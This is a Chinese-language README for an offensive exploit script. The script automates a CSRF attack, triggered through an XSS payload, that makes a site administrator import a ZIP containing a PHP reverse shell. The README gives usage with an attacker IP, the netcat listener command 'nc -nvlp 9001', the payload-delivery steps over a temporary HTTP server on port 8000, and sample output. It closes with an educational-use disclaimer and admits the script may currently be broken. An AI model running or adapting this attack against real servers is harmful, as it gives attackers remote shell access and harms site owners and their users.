该脚本自动化执行 CSRF(跨站请求伪造)攻击,将 PHP 反向 Shell 上传到目标 Web 服务器并执行它。反向 Shell 通过精心构造的 CSRF Payload 以 ZIP 文件形式传递,当特权用户与特定端点交互时触发。该脚本需要一个监听中的 Netcat 实例来捕获反向 Shell 连接。
目前似乎存在问题,稍后更新
./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>
target_url:目标的基础 URL(例如 https://example.com)。admin_endpoint:管理员主题导入端点的路径。admin_email:管理员邮箱地址(用于在 Payload 中伪造)。attacker_ip:反向 Shell 监听器将接收连接的 IP 地址。./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
attacker_ip 和端口 9001 生成 PHP 反向 Shell。love.php) 被压缩为 Love-exploit.zip。csrf_payload.html),其中包含一个 JavaScript 脚本,用于自动向目标管理面板提交恶意请求以导入反向 Shell。8000 上启动临时 HTTP 服务器,提供 Love-exploit.zip 文件供目标导入。在您的机器上启动 Netcat 监听器:
nc -nvlp 9001
运行脚本:
./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
等待目标执行 CSRF Payload 并接收反向 Shell 连接。
脚本在执行期间输出以下信息:
8000(HTTP 服务器)和 9001(Netcat 监听器)未被占用。[*] 确保 Netcat 正在监听:nc -nvlp 9001
[*] 等待 netcat 监听器...
[*] 正在创建 PHP 反向 Shell...
[*] 正在将 Shell 打包为 Love-exploit.zip...
[*] 正在获取 CSRF Token...
[+] CSRF Token 已获取:<token_value>
[*] 正在构建用于 CSRF 的 HTML Payload...
[*] 正在将 HTML 转换为 PNG...
[*] 正在检查端口 8000 上是否已有 HTTP 服务器...
[*] 正在启动新的 HTTP 服务器,端口 8000 用于 Payload 传递...
[*] 正在上传 XSS Payload 以触发 CSRF...
[*] 保持脚本运行以监控入站连接...
本文档仅供渗透测试人员和网络安全研究人员在受控环境中使用。未经授权的工具滥用是被严格禁止的。
此脚本仅用于教育目的和合法的网络安全评估。未经许可对系统进行未授权使用是违法的,并且违反道德准则。